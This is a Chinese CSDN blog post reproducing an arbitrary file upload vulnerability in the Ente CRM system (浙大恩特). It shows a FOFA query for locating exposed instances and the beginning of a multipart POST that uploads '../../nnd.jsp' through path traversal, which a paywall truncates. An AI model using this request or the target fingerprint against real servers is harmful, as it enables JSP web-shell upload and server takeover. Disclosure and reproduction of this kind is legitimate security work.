浙大恩特CRM前台任意文件上传漏洞(含批量验证poc)

已于 2024-04-09 21:42:19 修改
阅读量120 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-09 21:41:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137568769
版权
本文介绍了浙大恩特客户资源管理系统的一个文件上传漏洞,该漏洞可能导致服务器控制权被攻击者获取。内容包括漏洞描述、复现过程以及修复建议,建议受影响的用户更新官方补丁进行升级。
摘要由CSDN通过智能技术生成

产品简介
杭州恩软信息技术有限公司(浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司。
漏洞描述
浙大恩特客户资源管理系统存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。
fofa
title=”欢迎使用浙大恩特客户资源管理系统”
漏洞复现

POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryec63jznAR8GkjqFn
Content-Length: 216
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en

------WebKitFormBoundaryec63jznAR8GkjqFn
Content-Disposition: form-data; name="file"; filename="../../nnd.jsp"
Con
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
专栏目录
订阅专栏
浙大恩特客户资源管理系统CrmBasicAction.entcrm接口存在任意文件上传漏洞
nnn2188185的博客
01-16 183
浙大恩特客户资源管理系统CrmBasicAction.entcrm接口存在任意文件上传漏洞
浙大恩特CRM-machord_doc.jsp任意文件上传批量验证poc
weixin_43567873的博客
04-07 106
浙大恩特CRM-machord_doc.jsp任意文件上传批量验证poc
浙大恩特客户资源管理系统 CrmBasicAction.entcrm任意文件上传
Keepb1ue的博客
01-10 1909
浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。
漏洞复现-网康(奇安信)NGFW下一代防火墙远程命令执行
qq_17754023的博客
06-23 1389
网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。该NGFW存在远程命令执行漏洞,攻击者可通过构造特殊请求执行系统命令。凭借超强的应用识别能力,下一代防火墙可深入洞察网络流量中的用户、应用和内容,借助全新的高性能单路径异构并行处理引擎,在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护,帮助用户安全地开展业务并降低安全成本。
浙大恩特客户资源管理系统 crmbasicaction 任意文件上传
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
01-16 612
浙大恩特客户资源管理系统中的crmbasicaction接口存在安全漏洞,允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6(2),2024年最新面试题+笔记+项目实战
04-15 1271
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(
浙大恩特MailAction.entphone;.js任意文件上传批量验证poc
weixin_43567873的博客
04-07 79
浙大恩特MailAction.entphone;.js任意文件上传批量验证poc
浙大恩特-CRMCustomerAction文件上传批量验证poc
weixin_43567873的博客
04-07 207
浙大恩特-CRMCustomerAction文件上传批量验证poc
浙大恩特CRMfileupload.jsp任意文件上传批量验证poc
weixin_43567873的博客
04-07 72
浙大恩特CRMfileupload.jsp任意文件上传批量验证poc
爬虫项目总结(六)(随机user-agent
weixin_44327334的博客
11-02 480
首先在settings.py中设置 USER_AGENT = [ 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.418
Apache Slor 任意文件读取
MachineGunJoe666
04-16 386
Apache Slor 任意文件读取 一、简介 Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。Apache-Solr任意文件读取漏洞漏洞,攻击者可以在未授权的情况下读取目标服务器敏感文件和相关内容。 二、影响版本 Apache Slor <=8.8.1(网上已有原版本,本次测试7.7.1版本,踩踩坑) 三、环境搭建 1.下载版本 wget https://archive.apache.org/di
浏览器标识
风清扬的博客
11-26 3719
浏览器标识 谷歌: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 火狐: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0 Eage: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
windows NT的意义和各个版本
热门推荐
flyingpig2016的博客
11-22 4万+
navigator.userAgent中的window NT 今天为了尝试查看网址的来源document.referrer,但是不知道每个浏览器的版本号,然后我就用navigator.userAgent来获取当前浏览器的版本号,出了一大串字符串,根据代码测试结果: 代码: alert('来源是:'+document.referrer + '\n' + navigator.userAgent)
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
11-06 1667
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
防火墙|WAF|漏洞|网络安全
qq_43777616的博客
11-06 833
防火墙|WAF|漏洞|网络安全
网络安全从零开始学习CTF——CTF基本概念
最新发布
Hacker_Oldv的博客
11-09 627
不要太深入,差不多就可以了,对照文档就可以写出程序就差不多了且能看得懂就好了,因为每个语言都是学不完的,一直在更新,如果过分专注于一个语言,安全知识就挺容易漏下的。上面都是个人想法,怎么选都要靠自己决定,要不要深入、深入哪一门都是问题,一定要考虑清楚再下手,别等下学了一半就改变方向,这是学习的大忌,因为你学其它的也会这样,除非是你发现这个不是很适合你的发展。其中,一血、二血、三血拿的分数比较高,后面答该题的队伍拿的分数就一样了,答题的队伍越少,分数就越多,然后按分数排名,确定进入决赛的队伍。
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 1544
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
硬件设备网络安全问题与潜在漏洞分析及渗透测试应用
weixin_62512865的博客
11-08 1030
硬件加密绕过漏洞:研究发现,多款流行的SSD存在加密机制绕过漏洞,攻击者可以无需密码 即可绕过硬盘加密措施,获取硬盘中的数据内容。这包括Crucial和Samsung等品牌的SSD产 品,它们尝试实现TCG Opal加密标准,但存在缺陷,允许在不知道任何密钥的情况下完全恢 复数据。固件更新机制漏洞:英睿达MX500系列SSD被曝出存在缓冲区溢出漏洞,攻击者可以精心构 造ATA数据包,通过主机直接发送给SSD控制器,从而触发缓冲区溢出,可能导致数据泄露。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
11-05 521
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
浙大恩特外贸客户管理系统操作指南
"浙大恩特外贸客户管理系统使用手册" 浙大恩特外贸客户管理系统是一款专为外贸企业设计的高效管理工具,旨在帮助企业管理客户信息、跟进进度、销售计划以及日常运营。本手册详细介绍了系统的安装、使用和各项功能的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值